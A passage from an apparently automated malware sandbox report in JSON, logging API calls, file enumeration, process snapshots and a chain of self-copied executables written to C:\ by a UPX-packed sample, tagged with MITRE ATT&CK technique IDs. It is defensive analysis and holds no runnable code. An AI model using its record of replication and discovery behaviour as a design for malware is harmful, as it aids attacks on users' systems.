\"hxtbvp.exe\" called \"IsWow64Process\" with parameter \"3344\" - (UID: 00000000-00003344)\n \"dbjvvrj.exe\" called \"IsWow64Process\" with parameter \"3516\" - (UID: 00000000-00003516)\n \"880026.exe\" called \"IsWow64Process\" with parameter \"2380\" - (UID: 00000000-00002380)\n \"264846.exe\" called \"IsWow64Process\" with parameter \"3180\" - (UID: 00000000-00003180)\n \"884020.exe\" called \"IsWow64Process\" with parameter \"6116\" - (UID: 00000000-00006116)\n \"026844.exe\" called \"IsWow64Process\" with parameter \"3988\" - (UID: 00000000-00003988)\n \"0002440.exe\" called \"IsWow64Process\" with parameter \"4404\" - (UID: 00000000-00004404)\n \"646228.exe\" called \"IsWow64Process\" with parameter \"4436\" - (UID: 00000000-00004436)\n \"808828.exe\" called \"IsWow64Process\" with parameter \"2844\" - (UID: 00000000-00002844)\n \"6020448.exe\" called \"IsWow64Process\" with parameter \"712\" - (UID: 00000000-00000712)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c0048b22c0043b22c00000000000000000000002500000000011ce312000000000080f0120095e1e176a62b0700feffffff435ce5765059e576aa000000b800000042b22c0040b22c00a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000025001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede5766ab22c00a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb746ab22c00a06abb74a06abb7414e9120002020000 (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006052)\n \"442800.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f0068291f0063291f00000000000000000000001700000000011ce312000000000080f0120095e1e17683280700feffffff435ce5765059e576aa000000b800000062291f0060291f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede5768a291f00a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb748a291f00a06abb74a06abb7414e9120002020000 (UID: 00000000-00006016)\n \"442800.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006016)\n \"282462.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005892)\n \"282462.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000260080b626007bb62600000000000000000000001f00000000011ce312000000000080f0120095e1e176092f0700feffffff435ce5765059e576aa000000b80000007ab6260078b62600a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001f001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede576a2b62600a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb74a2b62600a06abb74a06abb7414e9120002020000 (UID: 00000000-00005892)\n \"282462.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005892)\n \"02006.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005764)\n \"02006.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300090b630008bb63000000000000000000000002900000000011ce312000000000080f0120095e1e176e92c0700feffffff435ce5765059e576aa000000b80000008ab6300088b63000a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000029001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede576b2b63000a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb74b2b63000a06abb74a06abb7414e9120002020000 (UID: 00000000-00005764)\n \"02006.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005764)\n \"248486.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e00c82f1e00c32f1e00000000000000000000001600000000011ce312000000000080f0120095e1e176ff500700feffffff435ce5765059e576aa000000b8000000c22f1e00c02f1e00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede576ea2f1e00a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb74ea2f1e00a06abb74a06abb7414e9120002020000 (UID: 00000000-00004108)\n \"248486.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004108)\n \"6002286.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003700582a3700532a3700000000000000000000002f00000000011ce312000000000080f0120095e1e17688570700feffffff435ce5765059e576aa000000b8000000522a3700502a3700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede5767a2a3700a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb747a2a3700a06abb74a06abb7414e9120002020000 (UID: 00000000-00005876)\n \"6002286.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"4484802.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b00a02c2b009b2c2b00000000000000000000002300000000011ce312000000000080f0120095e1e176a1560700feffffff435ce5765059e576aa000000b80000009a2c2b00982c2b00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede576c22c2b00a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb74c22c2b00a06abb74a06abb7414e9120002020000 (UID: 00000000-00004288)\n \"4484802.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004288)\n \"60480.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400982a3400932a3400000000000000000000002c00000000011ce312000000000080f0120095e1e176aa550700feffffff435ce5765059e576aa000000b8000000922a3400902a3400a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede576ba2a3400a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb74ba2a3400a06abb74a06abb7414e9120002020000 (UID: 00000000-00006076)\n \"60480.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006076)\n \"682088.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005900)\n \"682088.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b0088ac2b0083ac2b0000000000000000000000240000000001ecdf12000000000050ed120095e1e176b3540700feffffff435ce5765059e576aa000000b800000082ac2b0080ac2b0074e11200ace51200000000000000000000000000000000000000000000000000601f0000000024001c5ce47660d8ff74ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ede576aaac2b00a06abb748600000074e11200ace512000000000086008800a06abb7474e11200916cbb74aaac2b00a06abb74a06abb74e4e5120002020000 (UID: 00000000-00005900)\n \"682088.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005900)\n \"828684.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004100)\n \"828684.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400e8b62400e3b62400000000000000000000001d00000000011ce312000000000080f0120095e1e176a0590700feffffff435ce5765059e576aa000000b8000000e2b62400e0b62400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001d001c5ce47660d8ff74ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ede5760ab72400a06abb7486000000a4e41200dce812000000000086008800a06abb74a4e41200916cbb740ab72400a06abb74a06abb7414e9120002020000 (UID: 00000000-00004100)\n \"828684.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004100)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter 442800.exe (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter 934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00006052)\n \"442800.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006016)\n \"442800.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006016)\n \"442800.exe\" called \"FindNextFileW\" with parameter 282462.exe (UID: 00000000-00006016)\n \"442800.exe\" called \"FindNextFileW\" with parameter 442800.exe (UID: 00000000-00006016)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"282462.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"02006.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"682088.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"828684.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"44828.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hnvfx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ndtrth.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vtttbl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nbhbvdb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dljfl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tnhhvv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"64088.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6022622.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fpfntvj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hxtbvp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dbjvvrj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"880026.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"264846.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"884020.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"026844.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0002440.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"646228.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"808828.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6020448.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has an entrypoint in section \"UPX1\"\n \"466480.exe\" has an entrypoint in section \"UPX1\"\n \"nfxflv.exe\" has an entrypoint in section \"UPX1\"\n \"00680.exe\" has an entrypoint in section \"UPX1\"\n \"xxdfh.exe\" has an entrypoint in section \"UPX1\"\n \"604488.exe\" has an entrypoint in section \"UPX1\"\n \"jvxvt.exe\" has an entrypoint in section \"UPX1\"\n \"rjrxrhl.exe\" has an entrypoint in section \"UPX1\"\n \"hptvf.exe\" has an entrypoint in section \"UPX1\"\n \"rbffrbx.exe\" has an entrypoint in section \"UPX1\"\n \"nffbnt.exe\" has an entrypoint in section \"UPX1\"\n \"88880.exe\" has an entrypoint in section \"UPX1\"\n \"60248.exe\" has an entrypoint in section \"UPX1\"\n \"jtxbhtx.exe\" has an entrypoint in section \"UPX1\"\n \"lvjhvdf.exe\" has an entrypoint in section \"UPX1\"\n \"284804.exe\" has an entrypoint in section \"UPX1\"\n \"466842.exe\" has an entrypoint in section \"UPX1\"\n \"0246246.exe\" has an entrypoint in section \"UPX1\"\n \"nndjbrh.exe\" has an entrypoint in section \"UPX1\"\n \"frphr.exe\" has an entrypoint in section \"UPX1\"\n \"rlvbpdv.exe\" has an entrypoint in section \"UPX1\"\n \"tdxhf.exe\" has an entrypoint in section \"UPX1\"\n \"tvlvjll.exe\" has an entrypoint in section \"UPX1\"\n \"2686426.exe\" has an entrypoint in section \"UPX1\"\n \"4804844.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" wrote 13900 bytes starting with PE header signature to file \"C:\\442800.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"442800.exe\" wrote 13916 bytes starting with PE header signature to file \"C:\\282462.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"282462.exe\" wrote 13934 bytes starting with PE header signature to file \"C:\\02006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"02006.exe\" wrote 13950 bytes starting with PE header signature to file \"C:\\248486.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"248486.exe\" wrote 13969 bytes starting with PE header signature to file \"C:\\6002286.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6002286.exe\" wrote 13985 bytes starting with PE header signature to file \"C:\\4484802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4484802.exe\" wrote 14000 bytes starting with PE header signature to file \"C:\\60480.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60480.exe\" wrote 14011 bytes starting with PE header signature to file \"C:\\682088.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"682088.exe\" wrote 14025 bytes starting with PE header signature to file \"C:\\828684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"828684.exe\" wrote 14037 bytes starting with PE header signature to file \"C:\\44828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44828.exe\" wrote 14047 bytes starting with PE header signature to file \"C:\\hnvfx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hnvfx.exe\" wrote 14061 bytes starting with PE header signature to file \"C:\\ndtrth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ndtrth.exe\" wrote 14073 bytes starting with PE header signature to file \"C:\\pvvxhx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pvvxhx.exe\" wrote 14090 bytes starting with PE header signature to file \"C:\\vtttbl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vtttbl.exe\" wrote 14100 bytes starting with PE header signature to file \"C:\\nbhbvdb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nbhbvdb.exe\" wrote 14114 bytes starting with PE header signature to file \"C:\\dljfl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dljfl.exe\" wrote 14124 bytes starting with PE header signature to file \"C:\\lrxfh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lrxfh.exe\" wrote 14136 bytes starting with PE header signature to file \"C:\\tnhhvv.exe\": 